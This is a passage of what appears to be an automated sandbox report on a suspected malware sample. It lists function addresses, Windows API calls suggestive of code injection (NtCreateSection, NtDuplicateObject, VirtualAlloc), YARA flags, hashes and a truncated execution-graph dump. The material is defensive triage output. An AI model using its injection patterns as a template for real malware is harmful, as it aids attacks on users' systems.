                                                                      control_flow_graph 531 4018f4-40192e call 401186 Sleep call 4013fb 542 401930-401938 call 4014f4 531->542 543 40193d-401986 call 401186 531->543 542->543
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                      • Instruction ID: 61556fbd74693c1122d25878dabab91872ca5c85c54c0931cf2d8ffcbe0fb9f5
                                                                      • Opcode Fuzzy Hash: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                      • Instruction Fuzzy Hash: 5A0178B2248306FADB006AA49CA1EB932249B55715F308137FB13B90F1D57C8653F72B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018E9 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 557 4018e9-40192e call 401186 Sleep call 4013fb 566 401930-401938 call 4014f4 557->566 567 40193d-401986 call 401186 557->567 566->567
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                      • Instruction ID: 0cfdbf57c40ebd16915b75e0bcaa31018d6035999b4c8e4d4561116cd1d9419c
                                                                      • Opcode Fuzzy Hash: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                      • Instruction Fuzzy Hash: FA017CB2208305FADB006AA09C61EA937649B55715F30813BFA53780F1957D8653F62B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018FC Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                      • Instruction ID: 8924cd936244c1d255e5b8ad3bd9668b31b5227b00448509fbcd462ac300149e
                                                                      • Opcode Fuzzy Hash: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                      • Instruction Fuzzy Hash: 9A018FB2208305BBDF006AE08C62EA93B645F15315F244477FA53B91F2D57C9A52E72B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 025CB556 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 025CB5A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 025C6000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_25c6000_aueuggs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction ID: 580a0ee4bceeb2d5cbab3a4626e4c3ba5f242178191a1226038e7e986a5cd5a6
                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction Fuzzy Hash: CF113C79A00208EFDB01DF98CA85E99BFF5AF08350F158095F9489B361E775EA50DF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 025CB174 Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 025C6000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_25c6000_aueuggs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction ID: 65f425f66ad9128a85964cc543987ccfe526f44ca2c633940b3f6aaf9bf0dbd7
                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction Fuzzy Hash: 44117C72340100AFDB44DF99DC82FA677EAFB8C224B298069ED04CB315E675E802CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E5F4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950652655.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_409000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction ID: fd7403959e30d510bea130438df6ce884a441a3e606f3a8fbb41e365420ffc10
                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction Fuzzy Hash: 2711877200014DBBCF125E95DC01CEE3F22BB28354F588C26FA5864171C33BD971AB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:19.5%
                                                                      Dynamic/Decrypted Code Coverage:15.9%
                                                                      Signature Coverage:1.4%
                                                                      Total number of Nodes:1192
                                                                      Total number of Limit Nodes:79
                                                                      execution_graph 43550 156b170 43551 156b1ba LoadLibraryW 43550->43551 43553 156b21c 43551->43553 42490 6f0b6bc0 42491 6f0b6bde 42490->42491 42492 6f0b6c26 42491->42492 42500 6f109d21 42491->42500 42494 6f0b6bf7 42495 6f0b6c1d 42494->42495 42504 6f0b5300 42494->42504 42499 6f0b6c3c 42501 6f10e8d5 __EH_prolog3_catch 42500->42501 42512 6f109bb5 42501->42512 42503 6f10e8ed 42503->42494 42505 6f0b5322 42504->42505 42506 6f0b5329 42505->42506 42592 6f0b5840 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 42505->42592 42506->42495 42508 6f0b6c60 SafeArrayCreateVector SafeArrayAccessData 42506->42508 42509 6f0b6cad 42508->42509 42510 6f0b6c91 _memcpy_s 42508->42510 42509->42499 42511 6f0b6c9f SafeArrayUnaccessData 42510->42511 42511->42509 42515 6f109bbf 42512->42515 42514 6f109bd9 42514->42503 42515->42514 42520 6f109bdb std::exception::exception 42515->42520 42524 6f10c86e DecodePointer 42515->42524 42525 6f109d66 42515->42525 42517 6f109c19 42545 6f1095c1 66 API calls std::exception::operator= 42517->42545 42519 6f109c23 42546 6f10ac75 RaiseException 42519->42546 42520->42517 42542 6f109af4 42520->42542 42523 6f109c34 42524->42515 42526 6f109de3 42525->42526 42535 6f109d74 42525->42535 42553 6f10c86e DecodePointer 42526->42553 42528 6f109de9 42554 6f10d7d8 66 API calls __getptd_noexit 42528->42554 42531 6f109da2 RtlAllocateHeap 42532 6f109ddb 42531->42532 42531->42535 42532->42515 42534 6f109d7f 42534->42535 42547 6f10d74e 66 API calls 2 library calls 42534->42547 42548 6f10d59f 66 API calls 7 library calls 42534->42548 42549 6f10d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 42534->42549 42535->42531 42535->42534 42536 6f109dcf 42535->42536 42540 6f109dcd 42535->42540 42550 6f10c86e DecodePointer 42535->42550 42551 6f10d7d8 66 API calls __getptd_noexit 42536->42551 42552 6f10d7d8 66 API calls __getptd_noexit 42540->42552 42555 6f109ab8 42542->42555 42544 6f109b01 42544->42517 42545->42519 42546->42523 42547->42534 42548->42534 42550->42535 42551->42540 42552->42532 42553->42528 42554->42532 42556 6f109ac4 __setmbcp 42555->42556 42563 6f10d291 42556->42563 42562 6f109ae5 __setmbcp 42562->42544 42580 6f112438 42563->42580 42565 6f109ac9 42566 6f1099d1 RtlDecodePointer DecodePointer 42565->42566 42567 6f109a80 42566->42567 42568 6f1099ff 42566->42568 42579 6f109aee LeaveCriticalSection __cinit 42567->42579 42568->42567 42589 6f10d21b 67 API calls __mbstowcs_s_l 42568->42589 42570 6f109a11 42571 6f109a63 EncodePointer EncodePointer 42570->42571 42572 6f109a3b 42570->42572 42573 6f109a2c 42570->42573 42571->42567 42572->42567 42574 6f109a35 42572->42574 42590 6f10cb74 70 API calls __realloc_crt 42573->42590 42574->42572 42578 6f109a51 EncodePointer 42574->42578 42591 6f10cb74 70 API calls __realloc_crt 42574->42591 42577 6f109a4b 42577->42567 42577->42578 42578->42571 42579->42562 42581 6f112460 EnterCriticalSection 42580->42581 42582 6f11244d 42580->42582 42581->42565 42587 6f112376 66 API calls 7 library calls 42582->42587 42584 6f112453 42584->42581 42588 6f10d4f6 66 API calls 3 library calls 42584->42588 42587->42584 42589->42570 42590->42574 42591->42577 42592->42506 43554 6f0ba960 43555 6f0ba9a9 43554->43555 43556 6f0ba9cd 43555->43556 43558 6f0c2970 43555->43558 43569 6f0c29c3 43558->43569 43559 6f0c29ee SafeArrayGetLBound SafeArrayGetUBound 43562 6f0c2a20 SafeArrayGetElement 43559->43562 43566 6f0c2c53 43559->43566 43560 6f0c2d21 43560->43556 43561 6f0c2d1a SafeArrayDestroy 43561->43560 43562->43566 43562->43569 43563 6f0c2ab6 VariantInit 43563->43569 43564 6f0c2b3a VariantInit 43564->43569 43565 6f0c2c8b VariantClear VariantClear 43565->43566 43566->43560 43566->43561 43567 6f0c2d3a VariantClear VariantClear VariantClear 43567->43566 43569->43559 43569->43560 43569->43562 43569->43563 43569->43564 43569->43565 43569->43566 43569->43567 43570 6f0c2bf9 VariantClear VariantClear VariantClear 43569->43570 43571 6f0c2cb6 VariantClear VariantClear VariantClear 43569->43571 43573 6f0d3160 43569->43573 43570->43569 43571->43566 43574 6f0d3173 _memset 43573->43574 43575 6f0d318c 43574->43575 43578 6f0a51d0 43574->43578 43575->43569 43581 6f0a2a50 43578->43581 43594 6f0a4100 77 API calls 2 library calls 43581->43594 43583 6f0a2aab 43595 6f0f1160 71 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43583->43595 43585 6f0a2ade 43596 6f0f1160 71 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43585->43596 43587 6f0a2aea 43597 6f0a4c20 81 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43587->43597 43589 6f0a2af9 43598 6f0a3950 81 API calls 43589->43598 43591 6f0a2b2d 43592 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43591->43592 43593 6f0a2bdb 43592->43593 43593->43569 43594->43583 43595->43585 43596->43587 43597->43589 43598->43591 42593 61c4c50 42594 61c4c72 42593->42594 42597 61c51f9 42594->42597 42595 61c4c9a 42598 61c522c 42597->42598 42603 61b1568 42598->42603 42608 61b0f14 42598->42608 42613 61b0eb3 42598->42613 42599 61c5249 42599->42595 42604 61b15b6 42603->42604 42605 61b19c1 42604->42605 42618 61c52b8 42604->42618 42622 61c52b0 42604->42622 42605->42599 42609 61b0f15 42608->42609 42610 61b19c1 42609->42610 42611 61c52b8 338 API calls 42609->42611 42612 61c52b0 338 API calls 42609->42612 42610->42599 42611->42610 42612->42610 42614 61b0eb8 42613->42614 42615 61b19c1 42614->42615 42616 61c52b8 338 API calls 42614->42616 42617 61c52b0 338 API calls 42614->42617 42615->42599 42616->42615 42617->42615 42619 61c5323 42618->42619 42626 6f0d3eb0 42619->42626 42620 61c534c 42620->42605 42623 61c5323 42622->42623 42625 6f0d3eb0 338 API calls 42623->42625 42624 61c534c 42624->42605 42625->42624 42627 6f109bb5 77 API calls 42626->42627 42628 6f0d3f11 42627->42628 42629 6f109bb5 77 API calls 42628->42629 42630 6f0d3f36 42629->42630 42667 6f0b5050 42630->42667 42632 6f0d3f50 42633 6f109bb5 77 API calls 42632->42633 42634 6f0d3f57 42633->42634 42635 6f0b5050 77 API calls 42634->42635 42636 6f0d3f71 42635->42636 42637 6f109bb5 77 API calls 42636->42637 42638 6f0d3f78 42637->42638 42639 6f0b5050 77 API calls 42638->42639 42640 6f0d3f92 42639->42640 42641 6f109bb5 77 API calls 42640->42641 42642 6f0d3fab 42641->42642 42643 6f0d4031 42642->42643 42644 6f0d3fb2 42642->42644 42741 6f109533 66 API calls std::exception::_Copy_str 42643->42741 42675 6f0b16b0 42644->42675 42647 6f0d4047 42742 6f10ac75 RaiseException 42647->42742 42649 6f0d405e 42650 6f109bb5 77 API calls 42649->42650 42652 6f0d40b5 42650->42652 42651 6f0d3fdc 42651->42620 42653 6f109bb5 77 API calls 42652->42653 42654 6f0d40d8 42653->42654 42655 6f0b5050 77 API calls 42654->42655 42656 6f0d40f2 42655->42656 42657 6f109bb5 77 API calls 42656->42657 42658 6f0d40f9 42657->42658 42659 6f0b5050 77 API calls 42658->42659 42660 6f0d4113 42659->42660 42661 6f109bb5 77 API calls 42660->42661 42662 6f0d411a 42661->42662 42663 6f0b5050 77 API calls 42662->42663 42664 6f0d4134 42663->42664 42665 6f0b16b0 338 API calls 42664->42665 42666 6f0d4169 42665->42666 42666->42620 42668 6f0b505d 42667->42668 42669 6f0b5091 42667->42669 42668->42669 42670 6f0b5066 42668->42670 42672 6f0b509d 42669->42672 42744 6f0b5110 77 API calls std::_Xinvalid_argument 42669->42744 42674 6f0b507a 42670->42674 42743 6f0b5110 77 API calls std::_Xinvalid_argument 42670->42743 42672->42632 42674->42632 42676 6f109bb5 77 API calls 42675->42676 42677 6f0b1706 42676->42677 42678 6f0b1c39 42677->42678 42679 6f0b1711 42677->42679 42814 6f109533 66 API calls std::exception::_Copy_str 42678->42814 42745 6f0b2d70 42679->42745 42682 6f0b1c48 42815 6f10ac75 RaiseException 42682->42815 42685 6f0b2d70 77 API calls 42687 6f0b1788 42685->42687 42686 6f0b1c5d 42688 6f0b2d70 77 API calls 42687->42688 42689 6f0b17a9 42688->42689 42690 6f0b2d70 77 API calls 42689->42690 42691 6f0b17ca 42690->42691 42692 6f0b2d70 77 API calls 42691->42692 42693 6f0b17e6 42692->42693 42694 6f0b2d70 77 API calls 42693->42694 42695 6f0b182f 42694->42695 42696 6f0b2d70 77 API calls 42695->42696 42699 6f0b1878 42696->42699 42697 6f0b2d70 77 API calls 42698 6f0b18c6 42697->42698 42700 6f0b2d70 77 API calls 42698->42700 42699->42697 42701 6f0b18e7 42700->42701 42702 6f0b2d70 77 API calls 42701->42702 42703 6f0b1900 42702->42703 42704 6f0b2d70 77 API calls 42703->42704 42705 6f0b1946 42704->42705 42706 6f0b2d70 77 API calls 42705->42706 42707 6f0b198f 42706->42707 42708 6f0b2d70 77 API calls 42707->42708 42709 6f0b19d3 42708->42709 42710 6f0b2d70 77 API calls 42709->42710 42711 6f0b1a05 42710->42711 42753 6f0b3b30 42711->42753 42714 6f0b2d70 77 API calls 42715 6f0b1a21 42714->42715 42716 6f0b2d70 77 API calls 42715->42716 42717 6f0b1a82 42716->42717 42762 6f0b3bd0 42717->42762 42720 6f0b2d70 77 API calls 42721 6f0b1a9e 42720->42721 42722 6f0b2d70 77 API calls 42721->42722 42723 6f0b1aec 42722->42723 42771 6f0b2a80 42723->42771 42725 6f0b1b4c 42726 6f0b1b62 42725->42726 42811 6f10919e 67 API calls 3 library calls 42725->42811 42795 6f0b69e0 42726->42795 42799 6f0d30c0 42726->42799 42803 6f0b6850 42726->42803 42807 6f0d42e0 42726->42807 42727 6f0b1b58 42812 6f109125 67 API calls 2 library calls 42727->42812 42732 6f0b1b6d 42813 6f0b3530 67 API calls 42732->42813 42733 6f0b1b00 42733->42725 42733->42727 42733->42732 42777 6f0b2e60 42733->42777 42785 6f0b4640 42733->42785 42792 6f0b4750 42733->42792 42734 6f0b1ba1 42734->42651 42741->42647 42742->42649 42743->42674 42744->42672 42746 6f0b2db8 42745->42746 42751 6f0b2e0d 42746->42751 42816 6f0a5a30 42746->42816 42748 6f0b2e02 42838 6f0b3cc0 67 API calls 42748->42838 42830 6f10948b 42751->42830 42752 6f0b1746 42752->42685 42755 6f0b3b3d 42753->42755 42754 6f109bb5 77 API calls 42756 6f0b3b6f 42754->42756 42755->42754 42757 6f0b1a0c 42756->42757 42844 6f109533 66 API calls std::exception::_Copy_str 42756->42844 42757->42714 42759 6f0b3bae 42845 6f10ac75 RaiseException 42759->42845 42761 6f0b3bc3 42763 6f0b3bdd 42762->42763 42764 6f109bb5 77 API calls 42763->42764 42765 6f0b3c0f 42764->42765 42766 6f0b1a89 42765->42766 42846 6f109533 66 API calls std::exception::_Copy_str 42765->42846 42766->42720 42768 6f0b3c4e 42847 6f10ac75 RaiseException 42768->42847 42770 6f0b3c63 42772 6f0b2acd 42771->42772 42776 6f0b2ae6 42771->42776 42773 6f0b2adf 42772->42773 42848 6f1090d8 67 API calls 2 library calls 42772->42848 42849 6f0b31e0 77 API calls 2 library calls 42773->42849 42776->42733 42778 6f0b2ea8 42777->42778 42779 6f0a5a30 77 API calls 42778->42779 42784 6f0b2efd 42778->42784 42780 6f0b2ef2 42779->42780 42850 6f0b3cc0 67 API calls 42780->42850 42781 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42783 6f0b2f43 42781->42783 42783->42733 42784->42781 42786 6f0b466e 42785->42786 42787 6f0b4687 42785->42787 42786->42733 42851 6f0a5450 42787->42851 42789 6f0b4690 42882 6f0b2b70 77 API calls 42789->42882 42791 6f0b46ab 42791->42733 42897 6f0b2150 42792->42897 42794 6f0b475f 42794->42733 42796 6f0b69fe 42795->42796 42797 6f0b6a1f 42795->42797 42912 6f0b9110 42796->42912 42797->42732 42800 6f0d30f8 42799->42800 42801 6f0d30de 42799->42801 42800->42732 43038 6f0b5fa0 42801->43038 42804 6f0b686e 42803->42804 42805 6f0b6890 42803->42805 43059 6f0b8bc0 42804->43059 42805->42732 42808 6f0d42fe 42807->42808 42809 6f0d431d 42807->42809 43229 6f0b62c0 42808->43229 42809->42732 42811->42727 42812->42726 42813->42734 42814->42682 42815->42686 42817 6f109bb5 77 API calls 42816->42817 42818 6f0a5a64 42817->42818 42819 6f0a5a72 42818->42819 42839 6f109533 66 API calls std::exception::_Copy_str 42818->42839 42819->42748 42821 6f0a5ad0 42840 6f10ac75 RaiseException 42821->42840 42823 6f0a5ae5 42824 6f0a5b32 42823->42824 42825 6f109bb5 77 API calls 42823->42825 42824->42748 42826 6f0a5b07 42825->42826 42826->42824 42841 6f109533 66 API calls std::exception::_Copy_str 42826->42841 42828 6f0a5b1d 42842 6f10ac75 RaiseException 42828->42842 42831 6f109493 42830->42831 42832 6f109495 IsDebuggerPresent 42830->42832 42831->42752 42843 6f110036 42832->42843 42835 6f10ce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 42836 6f10cea3 GetCurrentProcess TerminateProcess 42835->42836 42837 6f10ce9b __call_reportfault 42835->42837 42836->42752 42837->42836 42838->42751 42839->42821 42840->42823 42841->42828 42842->42824 42843->42835 42844->42759 42845->42761 42846->42768 42847->42770 42848->42773 42849->42776 42850->42784 42852 6f109bb5 77 API calls 42851->42852 42853 6f0a5489 42852->42853 42854 6f0a5727 42853->42854 42855 6f0a5494 42853->42855 42894 6f109533 66 API calls std::exception::_Copy_str 42854->42894 42883 6f0a5760 42855->42883 42858 6f0a5739 42895 6f10ac75 RaiseException 42858->42895 42861 6f0a5750 42862 6f0a5760 77 API calls 42863 6f0a550d 42862->42863 42864 6f0a5760 77 API calls 42863->42864 42865 6f0a554d 42864->42865 42866 6f0a5760 77 API calls 42865->42866 42867 6f0a558d 42866->42867 42868 6f0a5760 77 API calls 42867->42868 42869 6f0a55cd 42868->42869 42870 6f0a5760 77 API calls 42869->42870 42871 6f0a560d 42870->42871 42872 6f0a5760 77 API calls 42871->42872 42873 6f0a564d 42872->42873 42874 6f0a5760 77 API calls 42873->42874 42875 6f0a568d 42874->42875 42891 6f0a5830 77 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 42875->42891 42877 6f0a56d2 42878 6f0a56dc 42877->42878 42892 6f10919e 67 API calls 3 library calls 42877->42892 42893 6f0b3530 67 API calls 42878->42893 42881 6f0a5705 42881->42789 42882->42791 42884 6f0a579c 42883->42884 42885 6f0a5a30 77 API calls 42884->42885 42889 6f0a57e6 42884->42889 42886 6f0a57dc 42885->42886 42896 6f0b3cc0 67 API calls 42886->42896 42888 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42890 6f0a54cd 42888->42890 42889->42888 42890->42862 42891->42877 42892->42878 42893->42881 42894->42858 42895->42861 42896->42889 42898 6f0b2199 42897->42898 42899 6f0b217d 42897->42899 42900 6f109bb5 77 API calls 42898->42900 42899->42794 42901 6f0b21a0 42900->42901 42902 6f109bb5 77 API calls 42901->42902 42903 6f0b21c7 42902->42903 42904 6f0b5050 77 API calls 42903->42904 42905 6f0b21e1 42904->42905 42906 6f109bb5 77 API calls 42905->42906 42907 6f0b21e8 42906->42907 42908 6f0b5050 77 API calls 42907->42908 42909 6f0b2202 42908->42909 42910 6f0b16b0 338 API calls 42909->42910 42911 6f0b222a 42910->42911 42911->42794 42913 6f0b912c EnterCriticalSection 42912->42913 42914 6f0b9121 42912->42914 42915 6f0b9150 42913->42915 42914->42797 42916 6f0b915b LeaveCriticalSection 42915->42916 42917 6f0b916a EnterCriticalSection 42916->42917 42918 6f0b923f 42916->42918 42919 6f0b9185 42917->42919 42918->42797 42920 6f0b9190 LeaveCriticalSection 42919->42920 42920->42918 42921 6f0b91a1 42920->42921 42928 6f0c6b10 42921->42928 42932 6f0c6b64 42928->42932 42929 6f0c6f19 InterlockedCompareExchange 42931 6f0b91f3 42929->42931 42931->42918 42999 6f0b9840 42931->42999 42932->42929 43014 6f0d2e20 42932->43014 42934 6f0c6edd 42934->42929 42935 6f0c6f12 SafeArrayDestroy 42934->42935 42935->42929 42936 6f0c6bc2 42936->42929 42936->42934 43018 6f0d28c0 InterlockedCompareExchange 42936->43018 42938 6f0c6c6b 42938->42929 42938->42934 42939 6f0c6c7e SafeArrayGetLBound 42938->42939 42939->42934 42940 6f0c6c99 SafeArrayGetUBound 42939->42940 42940->42934 42941 6f0c6cb4 SafeArrayAccessData 42940->42941 42941->42934 42942 6f0c6cd5 42941->42942 43019 6f0c5760 67 API calls std::tr1::_Xweak 42942->43019 42944 6f0c6cf5 SafeArrayUnaccessData 42944->42934 42945 6f0c6d07 42944->42945 42945->42934 43020 6f0b1690 77 API calls 42945->43020 42947 6f0c6d2c 42948 6f109bb5 77 API calls 42947->42948 42949 6f0c6d3f 42948->42949 42950 6f0b5050 77 API calls 42949->42950 42951 6f0c6d59 42950->42951 42952 6f109bb5 77 API calls 42951->42952 42953 6f0c6d63 42952->42953 42954 6f0b5050 77 API calls 42953->42954 42955 6f0c6d7f 42954->42955 42956 6f109bb5 77 API calls 42955->42956 42957 6f0c6d86 42956->42957 42958 6f0b5050 77 API calls 42957->42958 42959 6f0c6da0 42958->42959 43021 6f0b50c0 77 API calls 42959->43021 42961 6f0c6dab 42962 6f109bb5 77 API calls 42961->42962 42963 6f0c6db2 42962->42963 42964 6f0b5050 77 API calls 42963->42964 42965 6f0c6dcf 42964->42965 43022 6f0b50c0 77 API calls 42965->43022 42967 6f0c6dda 42968 6f109bb5 77 API calls 42967->42968 42969 6f0c6de7 42968->42969 42970 6f0b5050 77 API calls 42969->42970 42971 6f0c6e01 42970->42971 43023 6f0b50c0 77 API calls 42971->43023 42973 6f0c6e0c 42974 6f109bb5 77 API calls 42973->42974 42975 6f0c6e19 42974->42975 42976 6f0b5050 77 API calls 42975->42976 42977 6f0c6e33 42976->42977 42978 6f109bb5 77 API calls 42977->42978 42979 6f0c6e3a 42978->42979 42980 6f0b5050 77 API calls 42979->42980 42981 6f0c6e58 42980->42981 42982 6f109bb5 77 API calls 42981->42982 42983 6f0c6e5f 42982->42983 42984 6f0b5050 77 API calls 42983->42984 42985 6f0c6e79 42984->42985 43024 6f0b50c0 77 API calls 42985->43024 42987 6f0c6e84 43025 6f0b50c0 77 API calls 42987->43025 42989 6f0c6e8f 42990 6f109bb5 77 API calls 42989->42990 42991 6f0c6e9b 42990->42991 42992 6f0b5050 77 API calls 42991->42992 42993 6f0c6eb5 42992->42993 43026 6f0b50c0 77 API calls 42993->43026 42995 6f0c6ec0 43027 6f0b50c0 77 API calls 42995->43027 42997 6f0c6ecb 43028 6f0b2a40 338 API calls 42997->43028 43000 6f109bb5 77 API calls 42999->43000 43001 6f0b9865 43000->43001 43002 6f0b9227 43001->43002 43029 6f109533 66 API calls std::exception::_Copy_str 43001->43029 43007 6f0b7140 43002->43007 43004 6f0b98ab 43030 6f10ac75 RaiseException 43004->43030 43006 6f0b98c0 43031 6f0d2820 43007->43031 43009 6f0b71d7 43010 6f0b71f8 43009->43010 43037 6f109d2c 66 API calls 2 library calls 43009->43037 43010->42797 43012 6f0b719c 43012->43009 43036 6f10919e 67 API calls 3 library calls 43012->43036 43015 6f0d2e7b 43014->43015 43016 6f0d2e67 43014->43016 43015->42936 43016->43015 43017 6f0d2e9f InterlockedCompareExchange 43016->43017 43017->42936 43018->42938 43019->42944 43020->42947 43021->42961 43022->42967 43023->42973 43024->42987 43025->42989 43026->42995 43027->42997 43028->42934 43029->43004 43030->43006 43032 6f0d2845 43031->43032 43033 6f0d28af 43032->43033 43034 6f109d66 _malloc 66 API calls 43032->43034 43033->43012 43035 6f0d2876 43034->43035 43035->43012 43036->43009 43037->43010 43039 6f109bb5 77 API calls 43038->43039 43040 6f0b6003 43039->43040 43041 6f109bb5 77 API calls 43040->43041 43042 6f0b6028 43041->43042 43043 6f0b5050 77 API calls 43042->43043 43044 6f0b6042 43043->43044 43045 6f109bb5 77 API calls 43044->43045 43046 6f0b6049 43045->43046 43047 6f0b5050 77 API calls 43046->43047 43048 6f0b6067 43047->43048 43049 6f109bb5 77 API calls 43048->43049 43050 6f0b606e 43049->43050 43051 6f0b5050 77 API calls 43050->43051 43052 6f0b608b 43051->43052 43053 6f109bb5 77 API calls 43052->43053 43054 6f0b6092 43053->43054 43055 6f0b5050 77 API calls 43054->43055 43056 6f0b60ac 43055->43056 43057 6f0b16b0 338 API calls 43056->43057 43058 6f0b60de 43057->43058 43058->42800 43060 6f0b8bcc 43059->43060 43061 6f0b8bd5 EnterCriticalSection 43059->43061 43060->42805 43069 6f0ce030 43061->43069 43065 6f0b8c13 LeaveCriticalSection 43065->42805 43070 6f0ce05d 43069->43070 43071 6f0ce090 43069->43071 43073 6f109bb5 77 API calls 43070->43073 43074 6f0b8bec 43070->43074 43072 6f109bb5 77 API calls 43071->43072 43072->43074 43073->43074 43075 6f0bb6c0 GetModuleHandleW 43074->43075 43076 6f0bb72a GetProcAddress 43075->43076 43077 6f0bb717 LoadLibraryW 43075->43077 43078 6f0bb94c 43076->43078 43081 6f0bb73e 43076->43081 43077->43076 43077->43078 43079 6f10948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43078->43079 43080 6f0b8bfa 43079->43080 43080->43065 43088 6f0b8c40 43080->43088 43081->43078 43082 6f0bb85d 43081->43082 43102 6f10a116 80 API calls __mbstowcs_s_l 43082->43102 43084 6f0bb875 GetModuleHandleW 43084->43078 43085 